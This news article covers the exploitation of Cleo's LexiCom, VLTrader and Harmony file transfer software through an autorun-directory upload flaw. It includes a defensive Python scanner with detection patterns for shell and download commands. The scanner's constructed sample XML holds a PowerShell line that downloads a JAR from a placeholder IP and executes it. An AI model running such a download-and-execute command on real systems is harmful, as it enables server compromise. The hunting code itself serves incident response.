Cleo File Transfer Software Targeted by Widespread Exploitation of Critical Vulnerability
Cleo, a provider of managed file transfer (MFT) software, is dealing with reports of widespread exploitation of a critical vulnerability in its products, including on systems that had already been patched against the first disclosed flaw. Customers are being urged to take their Cleo installations off the public internet, or at least restrict access to them, until fixed versions are deployed.
The cybersecurity firm Huntress first observed exploitation on December 3, 2024, and reported that threat actors were actively abusing the flaw. The vulnerability, affecting Cleo's LexiCom, VLTrader, and Harmony products, allows unauthenticated remote code execution. It has been assigned CVE-2024-50623 and a critical CVSS score of 9.8. Cleo confirmed that the issue stems from an unrestricted file upload mechanism that can be leveraged to execute arbitrary code on the server.
Cleo, which reports a global customer base of more than 4,200 organizations, has since issued a further advisory for CVE-2024-55956, a separate vulnerability carrying the same risk of unauthenticated remote code execution. Although a patch for the first vulnerability was available, Huntress cautioned that it does not fully address the underlying issue and that patched servers were still being compromised. The affected products are specific versions of Cleo Harmony, VLTrader, and LexiCom, for which corrected releases were expected imminently.
In the exploit attempts analyzed by Huntress, the attackers dropped several files, among them an XML file containing a PowerShell command that retrieves a Java Archive (JAR) file from a remote server. The attack abuses the software's "autorun" directory: any file placed there is read and executed as soon as the application detects it, so a file upload into that directory becomes code execution.
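The practical check a responder wants here is a sweep of the autorun directory for files that carry shell or download commands. The script below is an added example, not code from Cleo or Huntress; it assumes only what the paragraph above states (files in the autorun directory are executed), and the directory name, file names, XML element names and the command string in the sample files are all constructed for illustration rather than taken from a real incident.

```python
"""Hunt for attacker-dropped command files in a Cleo autorun directory.

Added example (not Cleo's or Huntress's code). Assumes only that files placed
in the autorun directory are read and executed. The sample XML below is
constructed; its element names and the command it carries are assumptions.
"""
import os
import re
import tempfile
from dataclasses import dataclass, field

# Indicators of a downloader/loader command embedded in an autorun file:
# shell interpreters, download cmdlets and utilities, remote JAR references.
SUSPICIOUS_PATTERNS = {
    "powershell": re.compile(r"powershell(\.exe)?|\bpwsh\b", re.I),
    "cmd_shell": re.compile(r"cmd(\.exe)?\s+/c|/bin/(ba)?sh\b", re.I),
    "download": re.compile(
        r"Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|\bcurl\b|\bwget\b", re.I),
    "remote_jar": re.compile(r"https?://\S+\.jar\b", re.I),
    "base64_exec": re.compile(r"-enc(odedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "java_exec": re.compile(r"\bjava(\.exe)?\s+-jar\b", re.I),
}


@dataclass
class Finding:
    path: str
    indicators: list = field(default_factory=list)
    excerpt: str = ""


def scan_file(path):
    """Return a Finding if the file matches any indicator, else None."""
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    except OSError:
        return None
    hits = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(text)]
    if not hits:
        return None
    # Quote the region around the earliest match so an analyst sees context.
    first = min(SUSPICIOUS_PATTERNS[h].search(text).start() for h in hits)
    excerpt = text[max(0, first - 40): first + 120].replace("\n", " ")
    return Finding(path=path, indicators=hits, excerpt=excerpt)


def scan_autorun(autorun_dir, min_indicators=1):
    """Walk the autorun directory and collect files with enough indicators."""
    findings = []
    for root, _dirs, files in os.walk(autorun_dir):
        for name in sorted(files):
            f = scan_file(os.path.join(root, name))
            if f and len(f.indicators) >= min_indicators:
                findings.append(f)
    return findings


# Constructed samples: a benign-looking transfer action and a dropped file
# whose command fetches a remote JAR with PowerShell and launches it.
BENIGN_XML = """<?xml version="1.0"?>
<Host alias="partner-sftp">
  <Mailbox alias="outbound">
    <Action actionType="Commands">
      <Commands>PUT -DEL outbox/*.edi</Commands>
    </Action>
  </Mailbox>
</Host>
"""

MALICIOUS_XML = """<?xml version="1.0"?>
<Host alias="x">
  <Mailbox alias="x">
    <Action actionType="Commands">
      <Commands>SYSTEM powershell.exe -NonInteractive -Command "Invoke-WebRequest -Uri http://203.0.113.10/x.jar -OutFile $env:TEMP\\x.jar; java -jar $env:TEMP\\x.jar"</Commands>
    </Action>
  </Mailbox>
</Host>
"""


def build_sample_dir():
    """Create a throwaway autorun directory holding the two constructed files."""
    d = tempfile.mkdtemp(prefix="cleo-autorun-")
    with open(os.path.join(d, "partner.xml"), "w") as fh:
        fh.write(BENIGN_XML)
    with open(os.path.join(d, "dropped.xml"), "w") as fh:
        fh.write(MALICIOUS_XML)
    return d


if __name__ == "__main__":
    sample = build_sample_dir()
    for f in scan_autorun(sample):
        print(f"{f.path}: {', '.join(f.indicators)}\n    {f.excerpt}")
```

Point `scan_autorun` at the real autorun directory of a Cleo install (and, for completeness, the hosts configuration directory) and treat any hit as a file to preserve and examine rather than delete, since its timestamp and contents are evidence of when the server was reached and what was fetched. Raising `min_indicators` to 2 trims noise from legitimate actions that happen to mention `curl` or a shell.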
At least ten organizations, spanning consumer products, logistics, and food supply, have had their Cleo servers compromised, with a marked increase in activity recorded on December 8, 2024. In MITRE ATT&CK terms the observed activity is initial access through exploitation of a public-facing application (T1190), followed by persistence and execution via the files written to the autorun directory.
Security researchers report that ransomware groups, including Termite, have used zero-day exploits against Cleo's software. This continues a trend of such groups targeting managed file transfer products specifically. The observed tradecraft, reconnaissance against the file transfer server followed by remote command execution, resembles earlier campaigns attributed to groups like Cl0p.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2024-50623 to its Known Exploited Vulnerabilities catalog, requiring federal agencies to remediate it by January 3, 2025. CVE-2024-55956 has since been added as well, with CISA noting its use in ransomware attacks.
Cleo has publicly acknowledged both vulnerabilities, engaged external cybersecurity professionals, and is providing additional support to affected customers. Organizations running Harmony, VLTrader, or LexiCom should follow Cleo's security bulletin for the fixed versions, keep the products off the public internet until they are applied, and review the autorun directory and recent file uploads for unexpected files, since exploitation was observed even on servers carrying the first patch.